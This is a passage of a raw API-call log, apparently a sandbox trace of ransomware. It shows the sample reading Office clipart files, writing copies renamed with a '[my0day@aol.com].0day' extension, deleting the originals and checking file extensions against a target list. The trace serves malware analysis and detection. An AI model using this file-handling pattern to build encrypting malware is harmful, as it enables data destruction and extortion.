hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0052.224] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0052.224] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00126_.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0052.224] GetLastError () returned 0x0 [0052.224] ReadFile (in: hFile=0x228, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0xc44, lpOverlapped=0x0) returned 1 [0052.225] WriteFile (in: hFile=0x1a0, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xc50, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xc50, lpOverlapped=0x0) returned 1 [0052.226] ReadFile (in: hFile=0x228, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0052.226] WriteFile (in: hFile=0x1a0, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.226] SetEndOfFile (hFile=0x1a0) returned 1 [0052.226] CloseHandle (hObject=0x1a0) returned 1 [0052.227] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0052.227] SetEndOfFile (hFile=0x228) returned 1 [0052.227] CloseHandle (hObject=0x228) returned 1 [0052.228] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0052.228] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00126_.gif")) returned 1 [0052.228] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 63 [0052.228] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 63 [0052.228] lstrlenW (lpString=".doc") returned 4 [0052.228] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0052.228] lstrlenW (lpString=".docx") returned 5 [0052.228] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0052.228] lstrlenW (lpString=".pdf") returned 4 [0052.228] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0052.228] lstrlenW (lpString=".xls") returned 4 [0052.228] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0052.228] lstrlenW (lpString=".xlsx") returned 5 [0052.228] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0052.228] lstrlenW (lpString=".ppt") returned 4 [0052.228] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0052.228] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 63 [0052.228] lstrlenW (lpString=".zip") returned 4 [0052.228] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0052.228] lstrlenW (lpString=".rar") returned 4 [0052.228] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0052.228] lstrlenW (lpString=".bz2") returned 4 [0052.229] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0052.229] lstrlenW (lpString=".7z") returned 3 [0052.229] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0052.229] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 63 [0052.229] lstrlenW (lpString=".dbf") returned 4 [0052.229] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0052.229] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 63 [0052.229] lstrlenW (lpString=".1cd") returned 4 [0052.229] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0052.229] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00126_.GIF") returned 63 [0052.229] lstrlenW (lpString=".jpg") returned 4 [0052.229] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0052.229] GetFileSizeEx (in: hFile=0x228, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=12482) returned 1 [0052.229] CloseHandle (hObject=0x228) returned 1 [0052.229] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00129_.gif")) returned 0x20 [0052.229] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00129_.gif.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0052.229] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00129_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0052.229] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0052.229] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0052.230] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00129_.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0052.230] GetLastError () returned 0x0 [0052.230] ReadFile (in: hFile=0x228, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x30c2, lpOverlapped=0x0) returned 1 [0052.232] WriteFile (in: hFile=0x1a0, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x30d0, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x30d0, lpOverlapped=0x0) returned 1 [0052.233] ReadFile (in: hFile=0x228, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0052.233] WriteFile (in: hFile=0x1a0, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.233] SetEndOfFile (hFile=0x1a0) returned 1 [0052.233] CloseHandle (hObject=0x1a0) returned 1 [0052.233] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0052.233] SetEndOfFile (hFile=0x228) returned 1 [0052.234] CloseHandle (hObject=0x228) returned 1 [0052.234] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0052.234] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00129_.gif")) returned 1 [0052.234] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 63 [0052.234] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 63 [0052.234] lstrlenW (lpString=".doc") returned 4 [0052.234] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0052.234] lstrlenW (lpString=".docx") returned 5 [0052.234] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0052.234] lstrlenW (lpString=".pdf") returned 4 [0052.234] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0052.235] lstrlenW (lpString=".xls") returned 4 [0052.235] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0052.235] lstrlenW (lpString=".xlsx") returned 5 [0052.235] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0052.235] lstrlenW (lpString=".ppt") returned 4 [0052.235] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0052.235] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 63 [0052.235] lstrlenW (lpString=".zip") returned 4 [0052.235] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0052.235] lstrlenW (lpString=".rar") returned 4 [0052.235] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0052.235] lstrlenW (lpString=".bz2") returned 4 [0052.235] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0052.235] lstrlenW (lpString=".7z") returned 3 [0052.235] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0052.235] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 63 [0052.235] lstrlenW (lpString=".dbf") returned 4 [0052.235] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0052.235] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 63 [0052.235] lstrlenW (lpString=".1cd") returned 4 [0052.235] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0052.235] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00129_.GIF") returned 63 [0052.235] lstrlenW (lpString=".jpg") returned 4 [0052.235] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0052.235] GetFileSizeEx (in: hFile=0x228, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=5253) returned 1 [0052.235] CloseHandle (hObject=0x228) returned 1 [0052.236] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00130_.gif")) returned 0x20 [0052.236] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00130_.gif.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0052.236] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00130_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x228 [0052.236] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0052.236] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0052.236] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00130_.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a0 [0052.236] GetLastError () returned 0x0 [0052.236] ReadFile (in: hFile=0x228, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x1485, lpOverlapped=0x0) returned 1 [0052.418] WriteFile (in: hFile=0x1a0, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x1490, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x1490, lpOverlapped=0x0) returned 1 [0052.419] ReadFile (in: hFile=0x228, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0052.419] WriteFile (in: hFile=0x1a0, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xec, lpOverlapped=0x0) returned 1 [0052.419] SetEndOfFile (hFile=0x1a0) returned 1 [0052.662] CloseHandle (hObject=0x1a0) returned 1 [0052.662] SetFilePointerEx (in: hFile=0x228, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0052.662] SetEndOfFile (hFile=0x228) returned 1 [0052.663] CloseHandle (hObject=0x228) returned 1 [0052.663] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0052.663] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00130_.gif")) returned 1 [0053.545] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 63 [0053.545] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 63 [0053.545] lstrlenW (lpString=".doc") returned 4 [0053.545] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.545] lstrlenW (lpString=".docx") returned 5 [0053.545] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.545] lstrlenW (lpString=".pdf") returned 4 [0053.545] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.545] lstrlenW (lpString=".xls") returned 4 [0053.545] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.545] lstrlenW (lpString=".xlsx") returned 5 [0053.545] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.545] lstrlenW (lpString=".ppt") returned 4 [0053.545] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.545] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 63 [0053.545] lstrlenW (lpString=".zip") returned 4 [0053.545] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.545] lstrlenW (lpString=".rar") returned 4 [0053.545] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.545] lstrlenW (lpString=".bz2") returned 4 [0053.545] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.545] lstrlenW (lpString=".7z") returned 3 [0053.545] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.545] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 63 [0053.545] lstrlenW (lpString=".dbf") returned 4 [0053.545] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.545] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 63 [0053.545] lstrlenW (lpString=".1cd") returned 4 [0053.545] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.545] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00130_.GIF") returned 63 [0053.545] lstrlenW (lpString=".jpg") returned 4 [0053.545] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.808] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0053.808] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0053.808] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00167_.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x240 [0053.820] GetLastError () returned 0x0 [0053.820] ReadFile (in: hFile=0x23c, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x131e, lpOverlapped=0x0) returned 1 [0053.838] WriteFile (in: hFile=0x240, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0x1320, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0x1320, lpOverlapped=0x0) returned 1 [0053.839] ReadFile (in: hFile=0x23c, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0053.839] WriteFile (in: hFile=0x240, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.839] SetEndOfFile (hFile=0x240) returned 1 [0053.839] CloseHandle (hObject=0x240) returned 1 [0053.840] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0053.840] SetEndOfFile (hFile=0x23c) returned 1 [0053.840] CloseHandle (hObject=0x23c) returned 1 [0053.840] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0053.841] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00167_.gif")) returned 1 [0053.841] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 63 [0053.841] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 63 [0053.841] lstrlenW (lpString=".doc") returned 4 [0053.841] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.841] lstrlenW (lpString=".docx") returned 5 [0053.841] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.841] lstrlenW (lpString=".pdf") returned 4 [0053.841] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.841] lstrlenW (lpString=".xls") returned 4 [0053.841] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.841] lstrlenW (lpString=".xlsx") returned 5 [0053.841] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.841] lstrlenW (lpString=".ppt") returned 4 [0053.841] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.841] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 63 [0053.841] lstrlenW (lpString=".zip") returned 4 [0053.841] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.841] lstrlenW (lpString=".rar") returned 4 [0053.841] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.841] lstrlenW (lpString=".bz2") returned 4 [0053.841] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.841] lstrlenW (lpString=".7z") returned 3 [0053.841] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.841] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 63 [0053.842] lstrlenW (lpString=".dbf") returned 4 [0053.842] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0053.842] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 63 [0053.842] lstrlenW (lpString=".1cd") returned 4 [0053.842] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0053.842] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00167_.GIF") returned 63 [0053.842] lstrlenW (lpString=".jpg") returned 4 [0053.842] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0053.842] GetFileSizeEx (in: hFile=0x23c, lpFileSize=0x22dff1c | out: lpFileSize=0x22dff1c*=3120) returned 1 [0053.842] CloseHandle (hObject=0x23c) returned 1 [0053.842] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00176_.gif")) returned 0x20 [0053.842] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00176_.gif.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0053.842] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00176_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x23c [0053.842] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0053.842] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0053.842] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00176_.gif.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x240 [0053.843] GetLastError () returned 0x0 [0053.843] ReadFile (in: hFile=0x23c, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0xc30, lpOverlapped=0x0) returned 1 [0053.844] WriteFile (in: hFile=0x240, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xc40, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xc40, lpOverlapped=0x0) returned 1 [0053.845] ReadFile (in: hFile=0x23c, lpBuffer=0x3020020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x22dfed4, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesRead=0x22dfed4*=0x0, lpOverlapped=0x0) returned 1 [0053.845] WriteFile (in: hFile=0x240, lpBuffer=0x3020020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x22dfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3020020*, lpNumberOfBytesWritten=0x22dfc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.845] SetEndOfFile (hFile=0x240) returned 1 [0053.845] CloseHandle (hObject=0x240) returned 1 [0053.845] SetFilePointerEx (in: hFile=0x23c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x22dfec8 | out: lpNewFilePointer=0x0) returned 1 [0053.845] SetEndOfFile (hFile=0x23c) returned 1 [0053.846] CloseHandle (hObject=0x23c) returned 1 [0053.846] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0053.846] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00176_.gif")) returned 1 [0053.847] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 63 [0053.847] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 63 [0053.847] lstrlenW (lpString=".doc") returned 4 [0053.847] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0053.847] lstrlenW (lpString=".docx") returned 5 [0053.847] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1 [0053.847] lstrlenW (lpString=".pdf") returned 4 [0053.847] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0053.847] lstrlenW (lpString=".xls") returned 4 [0053.847] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0053.847] lstrlenW (lpString=".xlsx") returned 5 [0053.847] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1 [0053.847] lstrlenW (lpString=".ppt") returned 4 [0053.847] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0053.847] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 63 [0053.847] lstrlenW (lpString=".zip") returned 4 [0053.847] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0053.847] lstrlenW (lpString=".rar") returned 4 [0053.847] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0053.847] lstrlenW (lpString=".bz2") returned 4 [0053.847] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0053.847] lstrlenW (lpString=".7z") returned 3 [0053.847] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0053.847] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00176_.GIF") returned 63 [0053.847] lstrlenW 